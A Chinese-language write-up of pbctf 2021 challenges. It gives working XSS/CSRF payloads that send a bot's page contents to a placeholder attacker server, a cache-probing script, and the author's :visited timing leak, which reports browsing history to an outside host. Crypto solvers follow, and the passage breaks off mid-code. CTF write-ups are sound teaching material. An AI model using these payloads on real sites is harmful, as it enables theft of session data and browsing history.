pbctf 2021 WriteUps
這次久違的 Solo 用 nyahello 隊伍的名義參加了 pbctf 2021,crypto 部分只剩一題沒解,而 web 解了兩題再加 misc 的水題之後有第 15 名。果然第一名的 Perfect Blue 出的題目真的不簡單。

題目名稱上有 * 的題目代表是我賽後才解的。
Web#
TBDXSS#
from flask import Flask, request, session, jsonify, Response
import json
import redis
import random
import os
import time
app = Flask(__name__)
app.secret_key = os.environ.get("SECRET_KEY", "tops3cr3t")
app.config.update(
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_HTTPONLY=True,
SESSION_COOKIE_SAMESITE='Lax',
)
HOST = os.environ.get("CHALL_HOST", "localhost:5000")
r = redis.Redis(host='redis')
@app.after_request
def add_XFrame(response):
response.headers['X-Frame-Options'] = "DENY"
return response
@app.route('/change_note', methods=['POST'])
def add():
session['note'] = request.form['data']
session.modified = True
return "Changed succesfully"
@app.route("/do_report", methods=['POST'])
def do_report():
cur_time = time.time()
ip = request.headers.get('X-Forwarded-For').split(",")[-2].strip() #amazing google load balancer
last_time = r.get('time.'+ip)
last_time = float(last_time) if last_time is not None else 0
time_diff = cur_time - last_time
if time_diff > 6:
r.rpush('submissions', request.form['url'])
r.setex('time.'+ip, 60, cur_time)
return "submitted"
return "rate limited"
@app.route('/note')
def notes():
print(session)
return """
<body>
{}
</body>
""".format(session['note'])
@app.route("/report", methods=['GET'])
def report():
return """
<head>
<title>Notes app</title>
</head>
<body>
<h3><a href="/note">Get Note</a> <a href="/">Change Note</a> <a href="/report">Report Link</a></h3>
<hr>
<h3>Please report suspicious URLs to admin</h3>
<form action="/do_report" id="reportform" method=POST>
URL: <input type="text" name="url" placeholder="URL">
<br>
<input type="submit" value="submit">
</form>
<br>
</body>
"""
@app.route('/')
def index():
return """
<head>
<title>Notes app</title>
</head>
<body>
<h3><a href="/note">Get Note</a> <a href="/">Change Note</a> <a href="/report">Report Link</a></h3>
<hr>
<h3> Add a note </h3>
<form action="/change_note" id="noteform" method=POST>
<textarea rows="10" cols="100" name="data" form="noteform" placeholder="Note's content"></textarea>
<br>
<input type="submit" value="submit">
</form>
<br>
</body>
"""以上是這題核心部分的 code,而目標的 XSS bot 在 visit 的時候會預先帶有一個 session,其內容是 flag,所以在 visit /note 的時候會直接顯示出 flag。然後這題可以很簡單的用 CSRF 去 POST /change_note 達成 XSS,但是因為在 session 中的 flag 被蓋掉了所以 XSS 也沒用。
讓我想到解法的是它用 response.headers['X-Frame-Options'] = "DENY" 禁止 iframe 的那行的意義是什麼,想了一下就想到可以在自己的頁面上用兩個 iframe,一個先載入好 /note 之中的 flag 之後用另一個 iframe 去觸發 XSS,之後可以從 XSS 的那個 iframe 中用 top.frames 去存取有 flag 的那個 iframe 中的內容即可。
這題雖然禁止了 iframe,但是其實 window.open 也有類似的效果,只要先在 _blank 中打開之後 window.open 所回傳的就會是新分頁的 window object。而被打開的那個新分頁中也可以用 window.opener 去存取原先呼叫那個 window.open 的那個 tab 的 window,這樣就一樣能利用類似的方法去做到前面所述的事。
只是這次沒有 frames 能用,怎麼能讓它們取得恰當的 window object 呢? 我的作法是先讓一個頁面上 open 兩個 tab,一個是 CSRF 去 XSS 用的,另一個是會 delay 一下再去 open /note 觸發 XSS 用的,而原先的那個頁面就直接 location.href 轉到 /note。這樣你就能在 XSS 的那個 tab 上面的 window.opener 的這個 chain 上找到有 flag 的那個 window 了,這樣即可拿到 flag。
index.php:
因為 XSS bot 只載入到
loadevent 就會停止,所以要把它卡住,然後在新分頁中的main.php才是我真正的 payload
<script>
open(location.href + 'main.php', '_blank')
</script>
<img src="https://deelay.me/20000/https://example.com">main.php:
這就是所謂的那個主頁面,開啟兩個 tab 之後馬上 redirect 到有 flag 的
/note中
<script>
open(location.href.replace('main', 'submit'), '_blank')
open(location.href.replace('main', 'opennote'), '_blank')
location.href = 'https://tbdxss.chal.perfect.blue/note'
</script>submit.php:
很標準的 CSRF
<form action="https://tbdxss.chal.perfect.blue/change_note" method="POST" id=f>
<input name="data" value="peko">
</form>
<script>
f.data.value = '<script>const report = t => fetch("https://YOUR_SERVER/xss.php", {method: "POST", body: t}); report(window.opener.opener.document.body.textContent)</'+'script>'
f.submit()
</script>opennote.php:
delay 之後在新分頁中開啟有 XSS 的
/note,因為是在新分頁的緣故所以 XSS 的地方需要使用window.opener.opener才能存取到原先 redirect 到/note的main.php
<script>setTimeout(() => { open('https://tbdxss.chal.perfect.blue/note', '_blank') }, 1000)</script>Flag: pbctf{g1t_m3_4_p4g3_r3f3r3nc3}
Vault#
#!/usr/bin/env python3
import os
import socket
from flask import Flask
from flask import render_template
from flask import request
from flask_caching import Cache
from flask_recaptcha import ReCaptcha
app = Flask(__name__)
app.config["RECAPTCHA_SITE_KEY"] = os.environ["RECAPTCHA_SITE_KEY"]
app.config["RECAPTCHA_SECRET_KEY"] = os.environ["RECAPTCHA_SECRET_KEY"]
recaptcha = ReCaptcha(app)
cache = Cache(config={'CACHE_TYPE': 'FileSystemCache', 'CACHE_DIR':'/tmp/vault', 'CACHE_DEFAULT_TIMEOUT': 300})
cache.init_app(app)
@app.route("/<path:vault_key>", methods=["GET", "POST"])
def vault(vault_key):
parts = list(filter(lambda s: s.isdigit(), vault_key.split("/")))
level = len(parts)
if level > 15:
return "Too deep", 422
if not cache.get("vault"):
cache.set("vault", {})
main_vault = cache.get("vault")
c = main_vault
for v in parts:
c = c.setdefault(v, {})
values = c.setdefault("values", [])
if level > 8 and request.method == "POST":
value = request.form.get("value")
value = value[0:50]
values.append(value)
cache.set("vault", main_vault)
return render_template("vault.html", values = values, level = level)
@app.route("/", methods=["GET", "POST"])
def main():
if request.method == "GET":
return render_template("main.html")
else:
if recaptcha.verify():
url = request.form.get("url")
if not url:
return "The url parameter is required", 422
if not url.startswith("https://") and not url.startswith("http://"):
return "The url parameter is invalid", 422
s = socket.create_connection(("bot", 8000))
s.sendall(url.encode())
resp = s.recv(100)
s.close()
return resp.decode(), 200
else:
return "Invalid captcha", 422上面是這個題目核心部分的 code,主要有個 /12/24/8/31/.../ 的 path 可以讓你寫入內容到裡面去,沒有 XSS。然後它有個 bot 會先瀏覽這個網站 (http://vault.chal.perfect.blue/),然後隨機點擊十四層進到一個有十四層深的 path 中,然後在那個頁面上 submit flag 之後 visit 到你指定的任意網站:
async function click_vault(page, i) {
const vault = `a.vault-${i}`;
const elem = await page.waitForSelector(vault, { visible: true });
await Promise.all([page.waitForNavigation(), elem.click()]);
}
async function add_flag_to_vault(browser, url) {
if (!url || url.indexOf("http") !== 0) {
return;
}
const page = await browser.newPage();
try {
await page.goto(vaultUrl);
for (let i = 0; i < 14; i++) {
await click_vault(page, crypto.randomInt(1, 33));
}
await page.type("#value", FLAG);
await Promise.all([page.waitForNavigation(), page.click("#submit")]);
await page.goto(url);
await new Promise((resolve) => setTimeout(resolve, 30 * 1000));
} catch (e) {
console.log(e);
}
await page.close();
}這個題目的目標是要想辦法取得 bot 在瀏覽你的頁面之前最後所在的那個頁面的 url,然後就能獲得 flag 了。作法顯然是和 XS-Leaks 的 Cache Probing 有關,就是利用瀏覽器的 cache 去查詢一個 url 有沒有被 visit 過。最簡單的方法就是用 await fetch(url, { 'cache': 'force-cache' }) 然後計算它所經過的時間就可以判斷出有沒有 cache 過。
如果你試著在自己的頁面上測試會發現這樣沒有效果,但是在 chal.perfect.blue domain 之下的頁面卻可以成功,這個是因為現在的瀏覽器一般都有 Cache Partitioning 去把 cache 依照你的來源 origin 分開,這樣也能避免利用 cache 去查找你瀏覽過的 url 和 tracking 的問題。
我的作法是利用前一題 TBDXSS 的 domain 是 tbdxss.chal.perfect.blue 的這個事實,可以知道它和這題的 vault.chal.perfect.blue 使用的是同個 cache,用 fetch 測試也是有預期中的結果,所以只要在上面 XSS 去 Cache Probing 應該就能通過了。
不過一個困難點在於 TBDXSS 的 cookie 因為 SESSION_COOKIE_SECURE=True 的緣故所以都是 secure 的,代表只能在 https 下面作用,但是這題 bot 的 cache 是在 http://vault.chal.perfect.blue/ 底下,如果在一個 https 的頁面上存取 http 會被瀏覽器擋下來,然後收到 Mixed Content 的 warning。
後來我注意到如果在 https 的頁面上用 document.cookie = 'session=xxxx; path=/note' 之後去瀏覽 http://tbdxss.chal.perfect.blue/note,可以看到 cookie 一樣會被發送出去,這樣就能達成我們的目標。至於 xxxx 的部份也容易取得,只要向 TBDXSS 的 server POST 你的 payload 之後就能取得對應的 cookie 即 xxxx 的值了。
index.html:
開啟兩個頁面,一個是 CSRF 去 submit XSS payload 到 TBDXSS,另一個是 delay 之後開啟 TBDXSS 的
/note頁面觸發 XSS
<body>
<script>
open(location.href + 'submit.php', '_blank')
open(location.href + 'opennote.php', '_blank')
</script>
</body>opennote.php:
和前一題一樣
<script>setTimeout(() => { open('https://tbdxss.chal.perfect.blue/note', '_blank') }, 1000)</script>submit.php:
從
xss.js讀檔之後 POST 過去取得對應的 session cookie,然後生成一個設定document.cookie的 XSS payload,之後 redirect 到http版本的頁面之後在上面執行xss.js中真正的第二重 XSS
<?php
$xss = file_get_contents('xss.js');
$payload = '<script>'.$xss.'</script>';
$ch = curl_init('https://tbdxss.chal.perfect.blue/change_note');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'data' => $payload
]));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
function onHeader( $curl, $header_line ) {
global $sess;
if(strpos($header_line, 'session=') !== false){
$sess = explode(';', explode('session=', $header_line)[1])[0];
}
return strlen($header_line);
}
curl_setopt($ch, CURLOPT_HEADERFUNCTION, "onHeader");
$response = curl_exec($ch);
$js = 'document.cookie = "session=" + '.json_encode($sess).'+ "; path=/note"; location.href = "http://tbdxss.chal.perfect.blue/note";';
?>
<form action="https://tbdxss.chal.perfect.blue/change_note" method="POST" id=f>
<textarea name="data"></textarea>
</form>
<script>
f.data.value = "SET COOKIE<script>" + <?= json_encode($js) ?> + "</" + "script>"
f.submit()
</script>xss.js:
這部分是真正的 Cache Probing 的 code,發現到 cache 過的頁面所要的
fetch時間都小於 5ms,所以直接這樣遞迴爆破找 path 即可
const report = s => fetch(location.protocol + '//YOUR_SERVER/report.php', { method: 'POST', body: s })
const getLoadTime = async url => {
const start = performance.now()
await fetch(url, { cache: 'force-cache', mode: 'no-cors' })
return performance.now() - start
}
const buildUrl = parts => location.protocol + '//vault.chal.perfect.blue/' + parts.join('/') + '/'
window.onload = async () => {
try {
for (let i = 0; i < 5; i++) {
// warmup
await getLoadTime(location.protocol + '//vault.chal.perfect.blue/')
}
const brute = async parts => {
for (let i = 1; i <= 32; i++) {
const t = await getLoadTime(buildUrl(parts.concat([i])))
if (t < 5) {
const nextParts = parts.concat([i])
report(buildUrl(nextParts))
return brute(nextParts)
}
}
}
await brute([])
} catch (e) {
report(e.toString())
}
}
report('sancheck: ' + location.href)最後會發現因為一些未知的緣故,它只能找到 14-1=13 層的 path,但是這個很容易解決,寫個 python 腳本把最後一層爆破出來即可:
import requests
url = "http://vault.chal.perfect.blue/11/30/24/5/30/3/4/2/30/7/16/32/9/"
for i in range(1, 33):
r = requests.get(f"{url}{i}/")
if "pbctf" in r.text:
print(f"{url}{i}/", r.text)
# http://vault.chal.perfect.blue/11/30/24/5/30/3/4/2/30/7/16/32/9/26/
# pbctf{who_knew_that_history_was_not_so_private}這個腳本中的 url 不一定會 work,因為聽說它們後來加上了多個 instance,所以可能會在其它的 instance 上面
Intended Solution#
不過我這個做法似乎算是 unintended,預期解是利用 :visited 去 leak 一個 link 有沒有被 visie 過的樣子。
作者的 solution 如下:
<!DOCTYPE html>
<html>
<!--
Visited links are known to be leaky, see
https://bugs.chromium.org/p/chromium/issues/detail?id=713521
https://bugs.chromium.org/p/chromium/issues/detail?id=1247907
Can use requestAnimationFrame and requestIdleCallback to reliably check when a links :visited status changes
-->
<head>
<style>
#link {
position: absolute;
top: 0;
opacity: 0.001;
pointer-events: none;
}
a {
display: block;
}
.container {
display: grid;
grid-template-columns: 1fr 1fr;
}
.links {
width: 30vw;
}
</style>
</head>
<body>
<a id="link" href=""></a>
<div class="container">
<div class="links">
<h2>Visited links</h2>
<hr>
<div id="seen"></div>
</div>
<div class="links">
<h2>Unvisted links</h2>
<hr>
<div id="unseen"></div>
</div>
</div>
<script>
// const VAULT_URL = "http://localhost:5000/";
const VAULT_URL = "http://web:5000/";
const link = document.getElementById("link");
const seen = document.getElementById("seen");
const unseen = document.getElementById("unseen");
async function getLinkTime(url) {
let t1, t2 = 0;
await new Promise((resolve) => {
requestAnimationFrame(() => {
t1 = performance.now();
link.href = url;
requestIdleCallback(() => {
t2 = performance.now()
resolve();
}, { timeout: 1000 });
});
});
return t2 - t1;
}
async function hasLinkBeenVisited(url) {
await getLinkTime("");
const urlTime = await getLinkTime(url);
const urlTimeUnvisited = await getLinkTime(url + "?" + performance.now())
return urlTimeUnvisited > urlTime;
}
async function checkUrl(url) {
const a = document.createElement("a");
a.href = url;
a.innerText = url;
if (await hasLinkBeenVisited(url)) {
seen.prepend(a);
return true;
} else {
unseen.prepend(a);
return false;
}
}
async function setup() {
link.innerText = "aa ".repeat(0x10000);
let base = VAULT_URL;
while (true) {
let found = false;
const urls = [];
for (let i = 0; i < 33; i++) {
urls.push(`${base}${i}/`)
}
urls.push("http://adsfadsfadf.com");
for (const url of urls) {
if (await checkUrl(url)) {
base = url;
found = true;
break;
}
}
if (!found) {
break;
}
}
await fetch("http://aw.rs?" + base)
}
setup()
</script>
</body>
</html>瀏覽器中有沒瀏覽過的 link 和有瀏覽過的 link 有不同的顏色,例如在 Chromium 中預設分別是藍色和紫色。所以理論上如果能取得顏色應該就能判斷一個人是否有瀏覽過某個 url,而 getComputedStyle 也確實能讓你存取一個 element 的顏色。
不過,在它的文件中也有說明,為了隱私的緣故,它不會讓你分辨出 :visited 之後的顏色,所以一律只回傳沒有瀏覽過的顏色。
而作者的 solution 的方法可以看到它有個 a#link,位置是固定的,然後用 opacity 讓它近乎透明。之後在最一開始的時候對它插入一大堆字元 ("aa ".repeat(0x10000))。
此時如果你改變了 href,瀏覽器也會更新 :visited 的狀態,如果顏色有改變就代表要重新 renderer,因為有大量的文字所以它需要花上較多的時間才能重新 render 好。所以只要能存取瀏覽器重新 render 所需的時間就能 leak 出一些資訊。
在我的電腦上使用 Chrome 94 進行測試,那個
a#link不改顏色 vs 改顏色的時間差別大概是 0.1 vs 3~5ms
getLinkTime 裡面先使用了 requestAnimationFrame,這個函數會在瀏覽器 repaint 之前呼叫,它在 callback 裡面記錄下了時間 t1 以及更新 href,然後再用 requestIdleCallback 註冊另一個 callback。當另一個 callback 被呼叫的時候就 resolve(performance.now() - t1),這個時間差所代表的就是瀏覽器為了處裡這個 href 的更新所花的時間。
可能還會加上點處裡其他東西的時間,但是可做為微小誤差忽略不計
hasLinkBeenVisited 中一開始先用 getLinkTime("") 把 href 設定為空字串,然後確保它 render 完之後再繼續執行。這是為了確保 link 的顏色是紫色(和 :visited 相同)。之後先 getLinkTime 目標的 url 得到 urlTime,再用 getLinkTime 在另一個確保不會有 :visited 的 url 得到另一個時間 urlTimeUnvisited。
如果 url 是 :visited 的,那麼它顏色的變化將會是 紫->紫->藍,反之則是 紫->藍->藍。我們知道顏色變化所需的時間會遠大於不變化所需的時間,所以若是 urlTime < urlTimeUnvisited 就代表 url 是 :visited 的。
利用這個時間差就能爆破出目標的 path 出來,然後得到 flag 了。
我後來還有自己在 Firefox 做做看這個實驗,第一個困難點在於 Firefox 預設 performance.now() 的精度只有 ms 級別,所以很難有更加精準的時間。另一個是 Firefox 中的 getLinkTime 因為一些未知的原因似乎沒辦法像 Chromium 那麼精準的得到 href 改變所需的時間。最後自己多加了一些 code 也只能讓它高機率正確取得 path 中的第一個數字而已,第二個數字之後就會失敗。
Crypto#
Alkaloid Stream#
#!/usr/bin/env python3
import random
from flag import flag
def keygen(ln):
# Generate a linearly independent key
arr = [ 1 << i for i in range(ln) ]
for i in range(ln):
for j in range(i):
if random.getrandbits(1):
arr[j] ^= arr[i]
for i in range(ln):
for j in range(i):
if random.getrandbits(1):
arr[ln - 1 - j] ^= arr[ln - 1 - i]
return arr
def gen_keystream(key):
ln = len(key)
# Generate some fake values based on the given key...
fake = [0] * ln
for i in range(ln):
for j in range(ln // 3):
if i + j + 1 >= ln:
break
fake[i] ^= key[i + j + 1]
# Generate the keystream
res = []
for i in range(ln):
t = random.getrandbits(1)
if t:
res.append((t, [fake[i], key[i]]))
else:
res.append((t, [key[i], fake[i]]))
# Shuffle!
random.shuffle(res)
keystream = [v[0] for v in res]
public = [v[1] for v in res]
return keystream, public
def xor(a, b):
return [x ^ y for x, y in zip(a, b)]
def recover_keystream(key, public):
st = set(key)
keystream = []
for v0, v1 in public:
if v0 in st:
keystream.append(0)
elif v1 in st:
keystream.append(1)
else:
assert False, "Failed to recover the keystream"
return keystream
def bytes_to_bits(inp):
res = []
for v in inp:
res.extend(list(map(int, format(v, '08b'))))
return res
def bits_to_bytes(inp):
res = []
for i in range(0, len(inp), 8):
res.append(int(''.join(map(str, inp[i:i+8])), 2))
return bytes(res)
flag = bytes_to_bits(flag)
key = keygen(len(flag))
keystream, public = gen_keystream(key)
assert keystream == recover_keystream(key, public)
enc = bits_to_bytes(xor(flag, keystream))
print(enc.hex())
print(public)可以看到它先把 flag 轉換成 bits,然後生成同等長度的線性獨立的 key。之後利用 key 去生成一些 fake 的值,之後隨機生成 keystream 和 flag xor 加密。而 public 是根據每個 keystream 的 bit,調換 key 和 fake 的順序所生成的,所以要還原 keystream 需要找個方法能在沒有 key 的情況下去分出 key 和 fake 的差別。
可以先把 key 換成最基本的 1,2,4,...,512 來觀察看看:
['0000000001', '0000000010', '0000000100', '0000001000', '0000010000', '0000100000', '0001000000', '0010000000', '0100000000', '1000000000']
['0000001110', '0000011100', '0000111000', '0001110000', '0011100000', '0111000000', '1110000000', '1100000000', '1000000000', '0000000000']上面的 list 是 key 的二進位,然後下面的 list 是對應的 fake 的二進位,可以觀察出每個 fake 都是後 k 個 key 的 xor,如果剩下的 key 不到 k 個的話就不管它,所以 fake[-1] == 0 永遠成立。 (其中 k = len(key) // 3)
因為根據它 key 的生成方法我們知道 key 中不會有 0,所以有 0 的話肯定是 fake 的,這樣就能得出一個 key 的值。接下來有有一個 key 之後又能用類似的方法找到另一個 fake 的值,這樣又能恢復第二個 key,這樣用一樣的方法反覆下去就能恢復所有的 key 了。
import ast
from functools import reduce
from operator import xor
with open("output.txt") as f:
ct = bytes.fromhex(f.readline().strip())
public = ast.literal_eval(f.readline().strip())
window = len(public) // 3
print(window)
PT = list(zip(*public)) # transpose
rkey = []
fakei = -1
xk = 0 # the last element of fake is always 0
while len(rkey) != len(public):
if xk in PT[0] and PT[0].index(xk) != fakei:
ROW = False
else:
ROW = True
fakei = PT[ROW].index(xk)
k = PT[not ROW][fakei]
rkey.append(k)
print(fakei)
xk = reduce(xor, rkey[-window:])
key = rkey[::-1]
def recover_keystream(key, public):
st = set(key)
keystream = []
for v0, v1 in public:
if v0 in st:
keystream.append(0)
elif v1 in st:
keystream.append(1)
else:
assert False, "Failed to recover the keystream"
return keystream
def bits_to_bytes(inp):
res = []
for i in range(0, len(inp), 8):
res.append(int("".join(map(str, inp[i : i + 8])), 2))
return bytes(res)
ks = recover_keystream(key, public)
print(bytes(a ^ b for a, b in zip(ct, bits_to_bytes(ks))))
# pbctf{super_duper_easy_brute_forcing_actually_this_one_was_made_by_mistake}前面說的
k在這個 code 裡面叫window
Steroid Stream#
#!/usr/bin/env python3
import random
from flag import flag
def keygen(ln):
# Generate a linearly independent key
arr = [ 1 << i for i in range(ln) ]
for i in range(ln):
for j in range(i):
if random.getrandbits(1):
arr[j] ^= arr[i]
for i in range(ln):
for j in range(i):
if random.getrandbits(1):
arr[ln - 1 - j] ^= arr[ln - 1 - i]
return arr
def gen_keystream(key):
ln = len(key)
assert ln > 50
# Generate some fake values based on the given key...
fake = [0] * ln
for i in range(ln - ln // 3):
arr = list(range(i + 1, ln))
random.shuffle(arr)
for j in arr[:ln // 3]:
fake[i] ^= key[j]
# Generate the keystream
res = []
for i in range(ln):
t = random.getrandbits(1)
if t:
res.append((t, [fake[i], key[i]]))
else:
res.append((t, [key[i], fake[i]]))
# Shuffle!
random.shuffle(res)
keystream = [v[0] for v in res]
public = [v[1] for v in res]
return keystream, public
def xor(a, b):
return [x ^ y for x, y in zip(a, b)]
def recover_keystream(key, public):
st = set(key)
keystream = []
for v0, v1 in public:
if v0 in st:
keystream.append(0)
elif v1 in st:
keystream.append(1)
else:
assert False, "Failed to recover the keystream"
return keystream
def bytes_to_bits(inp):
res = []
for v in inp:
res.extend(list(map(int, format(v, '08b'))))
return res
def bits_to_bytes(inp):
res = []
for i in range(0, len(inp), 8):
res.append(int(''.join(map(str, inp[i:i+8])), 2))
return bytes(res)
flag = bytes_to_bits(flag)
key = keygen(len(flag))
keystream, public = gen_keystream(key)
assert keystream == recover_keystream(key, public)
enc = bits_to_bytes(xor(flag, keystream))
print(enc.hex())
print(public)這題和前一題很像,但是在生成 fake 的地方修改了一下,它讓 k = len(public) // 3 的 fake 都固定為 0,但是剩下的所有 fake 都會是 k 個 key 的 xor。
xor 這件是可以表示為 F2 中的加法,更多的 bits 也只是 F2n 的向量加法而已。 (n = len(public))
首先利用 k 個 fake 都是 0 的這件事可以讓我們得到三分之一的 key。根據 fake 的生成方法,剩下未知的 fake 之中起碼有一個是目前已知的 key 中的 k 個 key 的線性組合。這部分可以用 sage 的 solve_left 去解然後 check 看看解答中的向量的 1 的數量是否和 k 相等。
用這個方法就能實作出 solution 了,不過實際上跑起來要花上不少時間,在我的電腦上它花了約一個小時才跑出來:
import ast
from sage.all import GF, vector, matrix, ZZ
from tqdm import tqdm
with open("output.txt") as f:
ct = bytes.fromhex(f.readline().strip())
public = ast.literal_eval(f.readline().strip())
window = len(public) // 3
print(window)
PT = list(zip(*public)) # transpose
l = len(public)
def findpt(cond):
for i in range(l):
if cond(PT[0][i]):
yield 0, i
elif cond(PT[1][i]):
yield 1, i
def bink(x, k):
return bin(x)[2:].rjust(k, "0")
F = GF(2)
def int2vec(x, bits=len(public)):
v = vector(F, map(int, bink(x, bits)))
v.set_immutable()
return v
def vec2int(v):
return int("".join(map(str, v)), 2)
def is_in_span(M, t, k):
try:
r = M.solve_left(t)
return sum(r.change_ring(ZZ)) == k
except ValueError:
return False
rkey = set()
for r, i in findpt(lambda x: x == 0):
rkey.add(int2vec(PT[not r][i]))
pbar = tqdm(total=len(public))
pbar.n = len(rkey)
pbar.refresh()
while len(rkey) != len(public):
M = matrix(rkey)
def check(x):
return is_in_span(M, int2vec(x), window)
for r, i in findpt(check):
rkey.add(int2vec(PT[not r][i]))
pbar.n = len(rkey)
pbar.refresh()
print(len(rkey))
rkey = set(vec2int(v) for v in rkey)
key = list(rkey)
def recover_keystream(key, public):
st = set(key)
keystream = []
for v0, v1 in public:
if v0 in st:
keystream.append(0)
elif v1 in st:
keystream.append(1)
else:
assert False, "Failed to recover the keystream"
return keystream
def bits_to_bytes(inp):
res = []
for i in range(0, len(inp), 8):
res.append(int("".join(map(str, inp[i : i + 8])), 2))
return bytes(res)
ks = recover_keystream(key, public)
print(bytes(a ^ b for a, b in zip(ct, bits_to_bytes(ks))))
# takes ~1hr to run...
# pbctf{I_hope_you_enjoyed_this_challenge_now_how_about_playing_Metroid_Dread?}不過 intended solution 的算法似乎比我這個好多了,速度也會比較快。和這個有關但是我看不懂 :(
GoodHash#
#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Util.number import *
from flag import flag
import json
import os
import string
ACCEPTABLE = string.ascii_letters + string.digits + string.punctuation + " "
class GoodHash:
def __init__(self, v=b""):
self.key = b"goodhashGOODHASH"
self.buf = v
def update(self, v):
self.buf += v
def digest(self):
cipher = AES.new(self.key, AES.MODE_GCM, nonce=self.buf)
enc, tag = cipher.encrypt_and_digest(b"\0" * 32)
return enc + tag
def hexdigest(self):
return self.digest().hex()
if __name__ == "__main__":
token = json.dumps({"token": os.urandom(16).hex(), "admin": False})
token_hash = GoodHash(token.encode()).hexdigest()
print(f"Body: {token}")
print(f"Hash: {token_hash}")
inp = input("> ")
if len(inp) > 64 or any(v not in ACCEPTABLE for v in inp):
print("Invalid input :(")
exit(0)
inp_hash = GoodHash(inp.encode()).hexdigest()
if token_hash == inp_hash:
try:
token = json.loads(inp)
if token["admin"] == True:
print("Wow, how did you find a collision?")
print(f"Here's the flag: {flag}")
else:
print("Nice try.")
print("Now you need to set the admin value to True")
except:
print("Invalid input :(")
else:
print("Invalid input :(")這題題目生成一個固定的 json,然後使用一個自訂的 GoodHash 函數算雜湊,之後你得提供一個擁有相同 hash 的另一個 json,它在 parse 完之後有 admin: true 才行。
這個 GoodHash 函數很簡單,它把你的 hash data 作為 AES-GCM 的 nonce 輸入,而 key 是固定已知的,加密全部都是 0 的兩個 block 之後的輸出作為 hash output。
pycryptodome 中 GCM 的實作可以看到這個:
# Step 2 - Compute J0
if len(self.nonce) == 12:
j0 = self.nonce + b"\x00\x00\x00\x01"
else:
fill = (16 - (len(nonce) % 16)) % 16 + 8
ghash_in = (self.nonce +
b'\x00' * fill +
long_to_bytes(8 * len(nonce), 8))
j0 = _GHASH(hash_subkey, ghash_c).update(ghash_in).digest()
# Step 3 - Prepare GCTR cipher for encryption/decryption
nonce_ctr = j0[:12]
iv_ctr = (bytes_to_long(j0) + 1) & 0xFFFFFFFF這邊的 j0 才是真正作為 GCM 的 counter 的 IV,所以只要兩個 nonce 出來的 j0 相同就能有整個 GoodHash 的 collision,這樣目標就變成了 GHASH 這個函數的 collision。
pycryptodome 的 GCM 實作是參考這篇的,在裡面的 6.4 節有 GHASH 函數的 pseudo code。這個函數用 GF(28) 的運算表達起來非常簡單:
GHASH(H,X)=i=1∑nXiHn+1−i其中 H 是一個定值,對應到的是前面的 hash_subkey,而 X 是你的輸入的 blocks,即 ghash_in,也就是 padded 過的 nonce。前面的 hash_subkey 則是使用 AES-ECB 和相同的 key 去加密一個 block 的 0 得到的。
單純只是要 collision 的話很簡單,假設今天有一個固定的 message X1∣∣X2 有 hash T,想找一個 X1′∣∣X2′ 也擁有相同的 hash:
X1H2+X2HX1′H2+X2′H=T=T所以有 (X1−X1′)H2+(X2−X2′)H=0,取 X1′=X1+1 和 X2′=X2+H 就能找到其中一個 collision 了。
不過我們今天要的 collision 比較複雜,不只限定了輸入的字元還要求是合法的 json。把 token 加上 padding 之後可以拆成這樣的五個 blocks:
[b'{"token": "b3ea9', b'0a7b48bc6464fa63', b'xxxxxxxxxxx", "a', b'dmin": false}\x00\x00\x00', b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xe8']我們要想辦法控制 blocks[3] == b'dmin": true }\x00\x00\x00',然後對其它的 blocks 作些改動使得 hash 還是相同的才行。
改動 blocks[3] 也就是把 X4 換成 X4+C 的意思,所以需要其他的 X 做些調整才能使其相等。假設我對 X2 和 X3 做的調整叫做 A 和 B,那麼有:
只要是符合以上等式的 A,B,C 的調整都一定會有相同的 hash,不過我們需要找調整之後還可以是 ACCEPTABLE 和 legal json 的方法。
我的作法是注意到 blocks[2] 有部分是 json 的 format,但是 blocks[1] 是允許你隨意改動的,所以先生成一個 blocks[2] == b'xxxxxxxxxxxx","a',其中 x 都是隨機的 ACCEPTABLE 字元。這樣就能得到 B,然後計算 A=H2C−BH 之後把 X2+A 轉回 bytes 之後檢查是不是全部都是 ACCEPTABLE,失敗的話就再來一次。
from Crypto.Cipher import AES
from Crypto.Util.number import *
from sage.all import GF, PolynomialRing
import json
import os
import string
import random
ACCEPTABLE = (string.ascii_letters + string.digits + string.punctuation + " ").encode()
class GoodHash:
def __init__(self, v=b""):
self.key = b"goodhashGOODHASH"
self.buf = v
def update(self, v):
self.buf += v
def digest(self):
cipher = AES.new(self.key, AES.MODE_GCM, nonce=self.buf)
enc, tag = cipher.encrypt_and_digest(b"\0" * 32)
return enc + tag
def hexdigest(self):
return self.digest().hex()
def xor(a, b):
return bytes(x ^ y for x, y in zip(a, b))
subkey = AES.new(b"goodhashGOODHASH", AES.MODE_ECB).encrypt(b"\0" * 16)
# GF(2^128) utility functions are copied and modified from https://github.com/bozhu/AES-GCM-Python/blob/master/test_gf_mul.sage
x = PolynomialRing(GF(2), "x").gen()
F = GF(2 ** 128, "a", x ** 128 + x ** 7 + x ** 2 + x + 1)
a = F.gen()
def int2ele(integer):
res = 0
for i in range(128):
# rightmost bit is x127
res += (integer & 1) * (a ** (127 - i))
integer >>= 1
return res
def bytes2ele(b):
return int2ele(bytes_to_long(b))
def ele2int(element):
integer = element.integer_representation()
res = 0
for _ in range(128):
res = (res << 1) + (integer & 1)
integer >>= 1
return res
def ele2bytes(ele):
return long_to_bytes(ele2int(ele), 16)
def ghash(H, XS):
# H: ele
# XS: ele[]
Y = int2ele(0)
for X in XS:
Y = (Y + X) * H
return Y
def pad(b: bytes):
fill = (16 - (len(b) % 16)) % 16 + 8
ghash_in = b + b"\x00" * fill + long_to_bytes(8 * len(b), 8)
return ghash_in
def to_blocks(b: bytes, sz=16):
return [b[i : i + sz] for i in range(0, len(b), 16)]
def find_collision(token, max_attempt=2 ** 14):
H = bytes2ele(subkey)
blocks = to_blocks(pad(token))
assert len(blocks) == 5
C = bytes2ele(b'dmin": true }\x00\x00\x00') + bytes2ele(blocks[3])
new_blocks = list(blocks)
new_blocks[3] = ele2bytes(bytes2ele(new_blocks[3]) + C)
ele2 = bytes2ele(new_blocks[2])
ele1 = bytes2ele(new_blocks[1])
H2 = H * H
